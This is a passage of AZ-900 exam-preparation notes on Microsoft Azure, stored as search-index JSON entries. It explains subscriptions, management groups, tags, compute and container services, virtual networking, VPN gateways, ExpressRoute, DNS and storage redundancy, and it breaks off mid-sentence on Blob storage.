        A resource group can be used to scope access control for administrative actions. To manage a resource group, you can assign\u00a0Azure Policies,\u00a0Azure roles, or\u00a0resource locks.

        You can\u00a0apply tags\u00a0to a resource group. The resources in the resource group don't inherit those tags.

        You can deploy up to 800 instances of a resource type in each resource group. Some resource types are\u00a0exempt from the 800 instance limit. For more information, see\u00a0resource group limits.

        When you create a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\". The resource group stores metadata about the resources. When you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region. If a resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-subscription","title":"Azure Subscription","text":"

        An Azure subscription provides authenticated and authorized access to Azure products and services and allows organizations to provision cloud resources. Every Azure subscription links to an Azure account.

        In Azure, subscriptions are a unit of management, billing, and scale.

        An account can have multiple subscriptions, but it\u2019s only required to have one. In a multi-subscription account, you can use the subscriptions to configure different billing models and apply different access-management policies.

        You can use Azure subscriptions to define boundaries around Azure products, services, and resources. There are two types of subscription boundaries that you can use:

        • Billing boundary: This subscription type determines how an Azure account is billed for using Azure. You can create multiple subscriptions for different types of billing requirements. Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.
        • Access control boundary: Azure applies access-management policies at the subscription level, and you can create separate subscriptions to reflect different organizational structures. An example is that within a business, you have different departments to which you apply distinct Azure subscription policies. This billing model allows you to manage and control access to the resources that users provision with specific subscriptions.

        Use cases for creating additional subscriptions:

        • To separate Environments: separate environments for development and testing, security, or to isolate data for compliance reasons. This design is particularly useful because resource access control occurs at the subscription level.
        • To separate Organizational structures: you could limit one team to lower-cost resources, while allowing the IT department a full range. This design allows you to manage and control access to the resources that users provision within each subscription.
        • To separate Billing: For instance, you might want to create one subscription for your production workloads and another subscription for your development and testing workloads.

        After you've created an Azure account, you're free to create additional subscriptions. After you've created an Azure suscription, you can start creating Azure resources within each subscription.

        You can have up to 2000 role assignments in each subscription.

        Each Azure Subscription can not trust multiple Active Directories. An Azure subscription has a trust relationship with Azure Active Directory (Azure AD). A subscription trusts Azure AD to authenticate users, services, and devices. Multiple subscriptions can trust the same Azure AD directory. Each subscription can only trust a single directory.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#management-groups-in-azure","title":"Management Groups in Azure","text":"

        To efficiently manage access, policies (like available regions), and compliance when you manage multiple Azure subscriptions, you can use Management Groups, because management groups provide scope that sits above subscriptions.

        When managing multiple subscriptions, you organize those subscriptions into containers called management groups, to which you can then apply governance conditions. All subscriptions within a management group will, in turn, inherit the conditions you apply to the management group.

        All subscriptions within a single management group must trust the same Azure AD tenant.

        The image below highlights how you can create a hierarchy for governance through the use of management groups:

        Some examples of how you could use management groups might be:

        • Create a hierarchy that applies a policy.
        • Provide user access to multiple subscriptions.

        Facts we need to know:

        • Maximum of 10,000 management groups supported in a single directory.
        • A management group tree can support up to six levels of depth (root and subscription level not included)
        • Each management group and subscription can support only one parent.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tags","title":"Tags","text":"

        One way to organize related resources is to place them in their own subscriptions. You can also use resource groups to manage related resources. Resource tags are another way to organize resources. Tags provide extra information, or metadata, about your resources. A resource tag consists of a name and a value. You can assign one or more tags to each Azure resource. Keep in mind that you don't need to enforce that a specific tag is present on all of your resources.

        Name Value AppName The name of the application that the resource is part of. CostCenter The internal cost center code. Owner The name of the business owner who's responsible for the resource. Environment An environment name, such as \"Prod,\" \"Dev,\" or \"Test.\" Impact How important the resource is to business operations, such as \"Mission-critical,\" \"High-impact,\" or \"Low-impact.\"

        How do I manage resource tags?

        You can add, modify, or delete resource tags through Windows PowerShell, the Azure CLI, Azure Resource Manager templates, the REST API, or the Azure portal.

        You can also use Azure Policy to enforce tagging rules and conventions.

        Resources don't inherit tags from subscriptions and resource groups, meaning that you can apply tags at one level and not have those tags automatically show up at a different level, allowing you to create custom tagging schemas that change depending on the level (resource, resource group, subscription, and so on).

        Limitations to tags:

        • Not all resource types support tags.
        • Maximum of 50 tags (for Resource Groups and Resources).
          • Tag name length: 512 characters.
          • Tag value length: 256 characters.
        • Maximum of 15 tags for storage accounts.
          • Tag name length: 128 characters.
          • Tag value length: 256 characters. VM and VM scale sets: total set of 2048 character
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-compute-services-and-products","title":"Azure Compute services and products","text":"

        Azure compute is an on-demand computing service that organizations use to run cloud-based applications. It provides compute resources like disks, processors, memory, networking, and even operating systems. Azure supports many types of compute solutions, including Linux, Windows Server, SQL Server, Oracle, IBM, and SAP. Each Azure compute service offers different options depending on your requirements. The most common Azure compute services are:

        1. Azure Virtual Machines

          • VM Scale Sets
          • VM Availability Sets
        2. Azure Virtual Desktop

        3. Azure Container Instances

        4. Azure Functions (serverless computing)

        5. Azure Logic Apps (serverless computing)

        6. Azure App Service

        7. Azure Virtual Networking

        8. Azure Virtual Private Networks

        9. Azure ExpressRoute

        10. Azure DNS

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#1-azure-virtual-machines","title":"1. Azure Virtual Machines","text":"

        Virtual machines are virtual versions of physical computers that feature virtual processors, memory, storage, and networking resources. They host an operating system just like a physical computer, and you can install and run software on them just like a physical computer.

        VM provides IaaS and can be used in two ways:

        • When you need total control over an operating system /environment, VMs are ideal when using in-house or customized software.

        SLA for Virtual Machines

        • For all Virtual Machines that have two or more instances deployed across two or more Availability Zones in the same Azure region, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.99% of the time.

        • For all Virtual Machines that have two or more instances deployed in the same Availability Set or in the same Dedicated Host Group, we guarantee you will have Virtual Machine Connectivity to at least one instance at least 99.95% of the time.

        • For any Single Instance Virtual Machine using Premium SSD or Ultra Disk for all Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.9%.

        • For any Single Instance Virtual Machine using Standard SSD Managed Disks for Operating System Disk and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 99.5%.

        • For any Single Instance Virtual Machine using Standard HDD Managed Disks for Operating System Disks and Data Disks, we guarantee you will have Virtual Machine Connectivity of at least 95%.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-scale-sets","title":"Virtual Machine Scale Sets","text":"

        Azure can also manage the grouping of VMs for you with features such as scale sets and availability sets. A virtual machine scale set allows you to deploy and manage a set of identical VMs that you can use to deploy solutions with true autoscale. As demand increases, VM instances can be added.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#virtual-machine-availability-sets","title":"Virtual machine availability sets","text":"

        Virtual machine availability sets are another tool to \u00a0ensure that VMs stagger updates and have varied power and network connectivity, preventing you from losing all your VMs with a single network or power failure.

        Availability sets do this by grouping VMs in two ways: update domain and fault domain.

        • Update domain: The update domain groups VMs that can be rebooted at the same time.
        • Fault domain: The fault domain groups your VMs by common power source and network switch. By default, an availability set will split your VMs across up to three fault domains. This helps protect against a physical power or networking failure by having VMs in different fault domains.

        There\u2019s no additional cost for configuring an availability set. You only pay for the VM instances you create.

        When to use VMs: During testing and development, When running applications in the cloud, When extending your datacenter to the cloud, During disaster recovery.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#2-azure-virtual-desktop","title":"2. Azure Virtual Desktop","text":"

        Azure Virtual Desktop is a desktop and application virtualization service that runs on the cloud. It enables you to use a cloud-hosted version of Windows from any location. Azure Virtual Desktop provides centralized security management for users' desktops with Azure Active Directory (Azure AD). You can enable multifactor authentication to secure user sign-ins. You can also secure access to data by assigning granular role-based access controls (RBACs) to users. With Azure Virtual Desktop, the data and apps are separated from the local hardware. The actual desktop and apps are running in the cloud, meaning the risk of confidential data being left on a personal device is reduced. Azure Virtual Desktop lets you use Windows 10 or Windows 11 Enterprise multi-session, the only Windows client-based operating system that enables multiple concurrent users on a single VM.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#3-azure-container-instances","title":"3. Azure Container Instances","text":"

        Much like running multiple virtual machines on a single physical host, you can run multiple containers on a single physical or virtual host. Virtual machines appear to be an instance of an operating system that you can connect to and manage.

        VM vs Containers

        VM virtualizes the hardware emulating a computer. Containers virtualizes the Operating System. Unlike virtual machines, you don't manage the operating system for a container. Containers are a virtualization environment. If you need complete control, you use VM. On the other hands, Container priorizes portability and performance.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-instances-aci","title":"Azure Container Instances (ACI)","text":"

        Azure Container Instances offer the fastest and simplest way to run a container in Azure; without having to manage any virtual machines or adopt any additional services. Azure Container Instances are a platform as a service (PaaS) offering. Azure Container Instances allow you to upload your containers and then the service will run the containers for you.

        Azure Container Instances ACI versus Azure Kubernetes service AKS

        For many organizations, containers have become the preferred way to package, deploy, and manage cloud apps.

        • Azure Container Instances (ACI) is the easiest way to run a container in Azure, without the need for any VMs or other infrastructure. You can use docker images.
        • However, if you require full container orchestration, Microsoft recommends Azure Kubernetes Service (AKS).
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-container-apps","title":"Azure Container Apps","text":"

        Azure Container Apps are similar in many ways to a container instance. They allow you to get up and running right away, they remove the container management piece, and they're a PaaS offering. Container Apps have extra benefits such as the ability to incorporate load balancing and scaling. These other functions allow you to be more elastic in your design.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-kubernetes-service-aks","title":"Azure Kubernetes Service (AKS)","text":"

        Azure Kubernetes Service (AKS) is a container orchestration service. An orchestration service manages the lifecycle of containers. When you're deploying a fleet of containers, AKS can make fleet management simpler and more efficient.

        AKS simplifies the deployment of a managed Kubernetes cluster in Azure by offloading the operational overhead to Azure. Since it\u2019s hosted, Azure handles the health monitoring and maintenance. The Kubernetes masters are managed by Azure, and you manage and maintain the agent nodes.

        It\u2019s important to note that AKS itself is free. You pay only for the agent nodes within your clusters, not for the masters.

        You can deploy an AKS cluster using Azure CLI, Azure Portal, Azure Powershell, and Template-driven deployment options (ARM templates, bicep, terraform).

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#4-azure-functions-serverless-computing","title":"4. Azure Functions (serverless computing)","text":"

        Functions are a serverless technology that are best used in cases where you're concerned only about the code running your service and not the underlying platform or infrastructure.

        Azure Functions is an event-driven, serverless compute option that doesn\u2019t require maintaining virtual machines or containers. If you build an app using VMs or containers, those resources have to be \u201crunning\u201d in order for your app to function. With Azure Functions, an event wakes the function, alleviating the need to keep resources provisioned when there are no events.

        Benefits: - No infraestructure management: as a business you don't have to focus on administrative tasks. - Scalability. - You only pay for what you use. Price based on consumption: number of executions + runnign time for each.

        Functions are commonly used when you need to perform work in response to an event (often via a REST request), timer, or message from another Azure service. Azure Functions runs your code when it's triggered and automatically deallocates resources when the function is finished. In this model, you're only charged for the CPU time used while your function runs. Functions can be either stateless or stateful. When they're stateless (the default), they behave as if they're restarted every time they respond to an event. When they're stateful (called Durable Functions), a context is passed through the function to track prior activity.

        Generally, Azure Functions is stateless. BUT you can use an extension called Durable Functions to chain together functions and maintain their state while the functions are executing.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#5-azure-logic-apps-serverless-computing","title":"5. Azure Logic Apps (serverless computing)","text":"

        When you need something more complex than Functions, like a workflow or a process, Azure Logic Apps is a good solution. It enables you to create no-code and low-code solutions hosted in Azure to automate and orchestrate tasks, business processes, and workflows.

        Implementation can be done using a web-based design environment. You build the app by connecting triggers to actions with various connections.

        Price based on consumption: number of executions + type of connections that the app uses.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#6-azure-app-service","title":"6. Azure App Service","text":"

        App Service is a compute platform that you can use to quickly build, deploy, and scale enterprise grade web apps, background jobs, mobile back-ends, and RESTful APIs in the programming language of your choice (it supports multiple languages, including .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python) without managing infrastructure (it also supports both Windows and Linux environments).

        App service is a PaaS offering. It offers automatic scaling and high availability. It enables automated deployments from GitHub, Azure DevOps, or any Git repo to support a continuous deployment model.

        App Service handles most of the infrastructure decisions you deal with in hosting web-accessible apps:

        • Deployment and management are integrated into the platform.
        • Endpoints can be secured.
        • Sites can be scaled quickly to handle high traffic loads.
        • The built-in load balancing and traffic manager provide high availability.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#web-apps","title":"Web apps","text":"

        App Service includes full support for hosting web apps by using ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can choose either Windows or Linux as the host operating system.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#api-apps-azure-rest-api","title":"API apps (Azure Rest API)","text":"

        Much like hosting a website, you can build REST-based web APIs by using your choice of language and framework. You get full Swagger support and the ability to package and publish your API in Azure Marketplace. The produced apps can be consumed from any HTTP- or HTTPS-based client.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#webjobs","title":"WebJobs","text":"

        You can use the WebJobs feature to run a program (.exe, Java, PHP, Python, or Node.js) or script (.cmd, .bat, PowerShell, or Bash) in the same context as a web app, API app, or mobile app. They can be scheduled or run by a trigger. WebJobs are often used to run background tasks as part of your application logic.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#mobile-apps","title":"Mobile apps","text":"

        Use the Mobile Apps feature of App Service to quickly build a back end for iOS and Android apps. With just a few actions in the Azure portal, you can store mobile app data in a cloud-based SQL database; authenticate customers against common social providers, such as MSA, Google, Twitter, and Facebook; send push notifications; execute custom back-end logic in C# or Node.js.

        On the mobile app side, there's SDK support for native iOS and Android, Xamarin, and React native apps.

        • Access, manage, monitor Azure accounts and resources.
        • Monitor the health and status of Azure resources, check for alerts, diagnose and fix issues.
        • Stop, start, restart a web app or virtual machine.
        • Run the Azure CLI or Azure PowerShell commands to manage Azure resources.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor","title":"Azure Advisor","text":"

        Free service for tracking Azure consumption and getting offers recommendations not only for cost savings but also for performance, reliability, and security,

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates","title":"ARM templates","text":"

        ARM templates allow you to declaratively describe the resources you want to use, using JSON format. The template will then create those resources in parallel. For example, need 25 VMs, all 25 VMs will be created at the same time.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#7-azure-virtual-networking","title":"7. Azure Virtual Networking","text":"

        Azure virtual networks and virtual subnets enable Azure resources, such as VMs, web apps, and databases, to communicate with each other, with users on the internet, and with your on-premises client computers.

        Azure virtual networking supports both public and private endpoints to enable communication between external or internal resources with other internal resources.

        • Public endpoints have a public IP address and can be accessed from anywhere in the world.
        • Private endpoints exist within a virtual network and have a private IP address from within the address space of that virtual network.

        It provides the following key networking capabilities:

        Isolation and segmentation: Azure virtual network allows you to create multiple isolated virtual networks. For name resolution, you can use the name resolution service that's built into Azure. You also can configure the virtual network to use either an internal or an external DNS server.

        Internet communications: You can enable incoming connections from the internet by assigning a public IP address to an Azure resource, or putting the resource behind a public load balancer.

        Communicate between Azure resources: Enable Azure resources to communicate securely with each other. Virtual networks can connect not only VMs but other Azure resources. Service endpoints can connect to other Azure resource types.

        Communicate with on-premises resources: Azure virtual networks enable you to link resources together in your on-premises environment and within your Azure subscription. - Point-to-site virtual private network connections are from a computer outside your organization back into your corporate network. In this case, the client computer initiates an encrypted VPN connection to connect to the Azure virtual network. - Site-to-site virtual private networks link your on-premises VPN device or gateway to the Azure VPN gateway in a virtual network. In effect, the devices in Azure can appear as being on the local network. The connection is encrypted and works over the internet. - Azure ExpressRoute provides a dedicated private connectivity to Azure that doesn't travel over the internet. ExpressRoute is useful for environments where you need greater bandwidth and even higher levels of security.

        Route network traffic: By default, Azure routes traffic between subnets on any connected virtual networks, on-premises networks, and the internet. Route tables allow you to define rules about how traffic should be directed. Border Gateway Protocol (BGP) works with Azure VPN gateways, Azure Route Server, or Azure ExpressRoute to propagate on-premises BGP routes to Azure virtual networks.

        Filter network traffic: filter traffic between subnets. - Network security groups are Azure resources that can contain multiple inbound and outbound security rules. You can define these rules to allow or block traffic, based on factors such as source and destination IP address, port, and protocol. - Network virtual appliances are specialized VMs that can be compared to a hardened network appliance. A network virtual appliance carries out a particular network function, such as running a firewall or performing wide area network (WAN) optimization.

        Connect virtual networks: You can link virtual networks together by using virtual network peering. Peering allows two virtual networks to connect directly to each other. Network traffic between peered networks is private, and travels on the Microsoft backbone network, never entering the public internet. Peering enables resources in each virtual network to communicate with each other. These virtual networks can be in separate regions, which allows you to create a global interconnected network through Azure.

        User-defined routes (UDR) allow you to control the routing tables between subnets within a virtual network or between virtual networks. This allows for greater control over network traffic flow.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#8-azure-virtual-private-networks","title":"8. Azure Virtual Private Networks","text":"

        A virtual private network (VPN) uses an encrypted tunnel within another network. VPNs are typically deployed to connect two or more trusted private networks to one another over an untrusted network (typically the public internet). Traffic is encrypted while traveling over the untrusted network to prevent eavesdropping or other attacks. VPNs can enable networks to safely and securely share sensitive information.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-vpn-gateway-instances","title":"Azure VPN Gateway instances","text":"

        Azure VPN Gateway instances are deployed in a dedicated subnet of the virtual network and enable the following connectivity: - Connect on-premises datacenters to virtual networks through a site-to-site connection. - Connect individual devices to virtual networks through a point-to-site connection. - Connect virtual networks to other virtual networks through a network-to-network connection.

        When setting up a VPN gateway, you must specify the type of VPN - either policy-based or route-based:

        • Policy-based VPN gateways specify statically the IP address of packets that should be encrypted through each tunnel. This type of device evaluates every data packet against those sets of IP addresses to choose the tunnel where that packet is going to be sent through.
        • In Route-based gateways, IPSec tunnels are modeled as a network interface or virtual tunnel interface. IP routing (either static routes or dynamic routing protocols) decides which one of these tunnel interfaces to use when sending each packet. Route-based VPNs are the preferred connection method for on-premises devices. They're more resilient to topology changes such as the creation of new subnets.

        Use a route-based VPN gateway if you need any of the following types of connectivity:

        • Connections between virtual networks
        • Point-to-site connections
        • Multisite connections
        • Coexistence with an Azure ExpressRoute gateway

        There are a few ways to maximize the resiliency of your VPN gateway:

        Active/standby: By default, VPN gateways are deployed as two instances in an active/standby configuration, even if you only see one VPN gateway resource in Azure. When planned maintenance or unplanned disruption affects the active instance, the standby instance automatically assumes responsibility for connections without any user intervention.

        Active/active: With the introduction of support for the BGP routing protocol, you can also deploy VPN gateways in an active/active configuration. In this configuration, you assign a unique public IP address to each instance. You then create separate tunnels from the on-premises device to each IP address.

        ExpressRoute failover: Another high-availability option is to configure a VPN gateway as a secure failover path for ExpressRoute connections. ExpressRoute circuits have resiliency built in. However, they aren't immune to physical problems that affect the cables delivering connectivity or outages that affect the complete ExpressRoute location.

        Zone-redundant gateways: In regions that support availability zones, VPN gateways and ExpressRoute gateways can be deployed in a zone-redundant configuration. This configuration brings resiliency, scalability, and higher availability to virtual network gateways. These gateways require different gateway stock keeping units (SKUs) and use Standard public IP addresses instead of Basic public IP addresses.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#9-azure-expressroute","title":"9. Azure ExpressRoute","text":"

        Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection, with the help of a connectivity provider. This connection is called an ExpressRoute Circuit. These connection between Microsoft cloud services (such as Microsoft Azure and Microsoft 365) and the offices, datacenters, or other facilities would require its own ExpressRoute circuit.

        ExpressRoute connections don't go over the public Internet. ExpressRoute is a private connection from your on-premises infrastructure to your Azure infrastructure. Even if you have an ExpressRoute connection, DNS queries, certificate revocation list checking, and Azure Content Delivery Network requests are still sent over the public internet.

        • Connectivity to Microsoft cloud services across all regions in the geopolitical region.
        • Global connectivity to Microsoft services across all regions with the ExpressRoute Global Reach.
        • Dynamic routing between your network and Microsoft via Border Gateway Protocol (BGP).
        • Built-in redundancy in every peering location for higher reliability.

        ExpressRoute enables direct access to the following services in all regions:

        • Microsoft Office 365
        • Microsoft Dynamics 365
        • Azure compute services, such as Azure Virtual Machines
        • Azure cloud services, such as Azure Cosmos DB and Azure Storage
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#features","title":"Features","text":"

        Global connectivity: For example, say you had an office in Asia and a datacenter in Europe, both with ExpressRoute circuits connecting them to the Microsoft network. You could use ExpressRoute Global Reach to connect those two facilities, allowing them to communicate without transferring data over the public internet.

        Dynamic routing: ExpressRoute uses the BGP. BGP is used to exchange routes between on-premises networks and resources running in Azure. This protocol enables dynamic routing between your on-premises network and services running in the Microsoft cloud.

        Built-in redundancy: Each connectivity provider uses redundant devices to ensure that connections established with Microsoft are highly available. You can configure multiple circuits to complement this feature.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#expressroute-connectivity-models","title":"ExpressRoute connectivity models","text":"

        ExpressRoute supports four models that you can use to connect your on-premises network to the Microsoft cloud:

        Co-location at a cloud exchange: Your datacenter, office, or other facility is physically co-located at a cloud exchange, such as an ISP. In this case, you can request a virtual cross-connect to the Microsoft cloud.

        Point-to-point Ethernet connection: Point-to-point ethernet connection refers to using a point-to-point connection to connect your facility to the Microsoft cloud.

        Any-to-any networks: With any-to-any connectivity, you can integrate your wide area network (WAN) with Azure by providing connections to your offices and datacenters. Azure integrates with your WAN connection to provide a connection like you would have between your datacenter and any branch offices.

        Directly from ExpressRoute sites: You can connect directly into the Microsoft's global network at a peering location strategically distributed across the world. ExpressRoute Direct provides dual 100 Gbps or 10-Gbps connectivity, which supports Active/Active connectivity at scale.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#10-azure-dns","title":"10. Azure DNS","text":"

        Azure DNS is a hosting service for DNS domains that provides name resolution by using Microsoft Azure infrastructure. By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. Azure DNS can manage DNS records for your Azure services and provide DNS for your external resources as well. Applications that require automated DNS management can integrate with the service by using the REST API and SDKs.

        Azure DNS is based on Azure Resource Manager, which provides features such as:

        • Azure role-based access control (Azure RBAC) to control who has access to specific actions for your organization.
        • Activity logs to monitor how a user in your organization modified a resource or to find an error when troubleshooting.
        • Resource locking to lock a subscription, resource group, or resource. Locking prevents other users in your organization from accidentally deleting or modifying critical resources.

        Azure DNS also supports private DNS domains. This feature allows you to use your own custom domain names in your private virtual networks, rather than being stuck with the Azure-provided names.

        Azure DNS also supports alias record sets. You can use an alias record set to refer to an Azure resource, such as an Azure public IP address, an Azure Traffic Manager profile, or an Azure Content Delivery Network (CDN) endpoint.

        You can't use Azure DNS to buy a domain name. For an annual fee, you can buy a domain name by using App Service domains or a third-party domain name registrar. Once purchased, your domains can be hosted in Azure DNS for record management.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services","title":"Azure Storage Services","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#intro","title":"Intro","text":"

        A storage account provides a unique namespace for your Azure Storage data that's accessible from anywhere in the world over HTTP or HTTPS. Data in this account is secure, highly available, durable, and massively scalable. When you create your storage account, you\u2019ll start by picking the storage account type. The type of account determines the storage services and redundancy options and has an impact on the use cases.

        Type Supported services Redundancy Options Usage Standard general-purpose v2 Blob Storage (including Data Lake Storage), Queue Storage, Table Storage, and Azure Files LRS, GRS, RA-GRS, ZRS, GZRS, RA-GZRS Standard storage account type for blobs, file shares, queues, and tables. Recommended for most scenarios using Azure Storage. If you want support for network file system (NFS) in Azure Files, use the premium file shares account type. Premium block blobs Blob Storage (including Data Lake Storage) LRS, ZRS Premium storage account type for block blobs and append blobs. Recommended for scenarios with high transaction rates or that use smaller objects or require consistently low storage latency. Premium file shares Azure Files LRS, ZRS Premium storage account type for file shares only. Recommended for enterprise or high-performance scale applications. Use this account type if you want a storage account that supports both Server Message Block (SMB) and NFS file shares. Premium page blobs Page blobs only LRS Premium storage account type for page blobs only.

        Some acronyms here:

        • Locally redundant storage (LRS)
        • Geo-redundant storage (GRS)
        • Read-access geo-redundant storage (RA-GRS)
        • Zone-redundant storage (ZRS)
        • Geo-zone-redundant storage (GZRS)
        • Read-access geo-zone-redundant storage (RA-GZRS)

        Storage account endpoints:

        The following table shows the endpoint format for Azure Storage services.

        Storage service Endpoint Blob Storage https://\\<storage-account-name>.blob.core.windows.net Data Lake Storage Gen2 https://\\<storage-account-name>.dfs.core.windows.net Azure Files https://\\<storage-account-name>.file.core.windows.net Queue Storage https://\\<storage-account-name>.queue.core.windows.net Table Storage https://\\<storage-account-name>.table.core.windows.net

        Other data for the exam:

        • Maximum capacity for storage accounts: 5 PB.
        • Number of storage accounts per region per suscription: 250.
        • Maximum number of virtual network rules and IP network rules allowed per storage account in Azure: 200
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-redundancy","title":"Azure storage redundancy","text":"

        Data in an Azure Storage account is always replicated three times in the primary region. Azure Storage offers two options for how your data is replicated in the primary region, locally redundant storage (LRS) and zone-redundant storage (ZRS).

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-primary-region","title":"Redundancy in the primary region","text":"

        Locally redundant storage (LRS)

        Locally redundant storage (LRS) replicates your data three times within a single data center in the primary region. LRS provides at least 11 nines of durability (99.999999999%) of objects over a given year. LRS is the lowest-cost redundancy option and offers the least durability compared to other options. LRS protects your data against server rack and drive failures. However, if a disaster such as fire or flooding occurs within the data center, all replicas of a storage account using LRS may be lost or unrecoverable. To mitigate this risk, Microsoft recommends using zone-redundant storage (ZRS), geo-redundant storage (GRS), or geo-zone-redundant storage (GZRS).

        Zone-redundant storage (ZRS)

        For Availability Zone-enabled Regions, zone-redundant storage (ZRS) replicates your Azure Storage data synchronously across three Azure availability zones in the primary region. ZRS offers durability for Azure Storage data objects of at least 12 nines (99.9999999999%) over a given year. With ZRS, your data is still accessible for both read and write operations even if a zone becomes unavailable. Microsoft recommends using ZRS in the primary region for scenarios that require high availability. ZRS is also recommended for restricting replication of data within a country or region to meet data governance requirements.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-secondary-region","title":"Redundancy in the secondary region","text":"

        For applications requiring high durability, you can choose to additionally copy the data in your storage account to a secondary region that is hundreds of miles away from the primary region. If the data in your storage account is copied to a secondary region, then your data is durable even in the event of a catastrophic failure that prevents the data in the primary region from being recovered. When you create a storage account, you select the primary region for the account. The paired secondary region is based on Azure Region Pairs, and can't be changed.

        By default, data in the secondary region isn't available for read or write access unless there's a failover to the secondary region. If the primary region becomes unavailable, you can choose to fail over to the secondary region. After the failover has completed, the secondary region becomes the primary region, and you can again read and write data.

        Because data is replicated to the secondary region asynchronously, a failure that affects the primary region may result in data loss if the primary region can't be recovered. The interval between the most recent writes to the primary region and the last write to the secondary region is known as the recovery point objective (RPO). The RPO indicates the point in time to which data can be recovered. Azure Storage typically has an RPO of less than 15 minutes, although there's currently no SLA on how long it takes to replicate data to the secondary region.

        Azure Storage offers two options for copying your data to a secondary region: geo-redundant storage (GRS) and geo-zone-redundant storage (GZRS). GRS is similar to running LRS in two regions, and GZRS is similar to running ZRS in the primary region and LRS in the secondary region.

        Geo-redundant storage (GRS)

        GRS copies your data synchronously three times within a single physical location in the primary region using LRS. It then copies your data asynchronously to a single physical location in the secondary region (the region pair) using LRS. GRS offers durability for Azure Storage data objects of at least 16 nines (99.99999999999999%) over a given year.

        Geo-zone-redundant storage (GZRS)

        GZRS combines the high availability provided by redundancy across availability zones with protection from regional outages provided by geo-replication. Data in a GZRS storage account is copied across three Azure availability zones in the primary region (similar to ZRS) and is also replicated to a secondary geographic region, using LRS, for protection from regional disasters. Microsoft recommends using GZRS for applications requiring maximum consistency, durability, and availability, excellent performance, and resilience for disaster recovery. GZRS is designed to provide at least 16 nines (99.99999999999999%) of durability of objects over a given year.

        Read access to data in the secondary region (RA-GRS)

        Geo-redundant storage (with GRS or GZRS) replicates your data to another physical location in the secondary region to protect against regional outages. However, that data is available to be read only if the customer or Microsoft initiates a failover from the primary to secondary region. However, if you enable read access to the secondary region, your data is always available, even when the primary region is running optimally. For read access to the secondary region, enable read-access geo-redundant storage (RA-GRS) or read-access geo-zone-redundant storage (RA-GZRS). Remember that the data in your secondary region may not be up-to-date due to RPO.

        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services_1","title":"Azure storage services","text":"
          1. Azure Blobs: A massively scalable object store for text and binary data. Also includes support for big data analytics through Data Lake Storage Gen2.
          1. Azure Files: Managed file shares for cloud or on-premises deployments.
          1. Azure Queues: A messaging store for reliable messaging between application components.
          1. Azure Disks: Block-level storage volumes for Azure VMs.
          1. Azure Tables:\u00a0NoSQL table option for structured, non-relational data.
        ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-blobs","title":"Azure Blobs","text":"

        To store massive amounts of data, such as text or binary data. Azure Blob storage is unstructured, meaning that there are no restrictions on the kinds of data it can hold. Blob storage is ideal for:

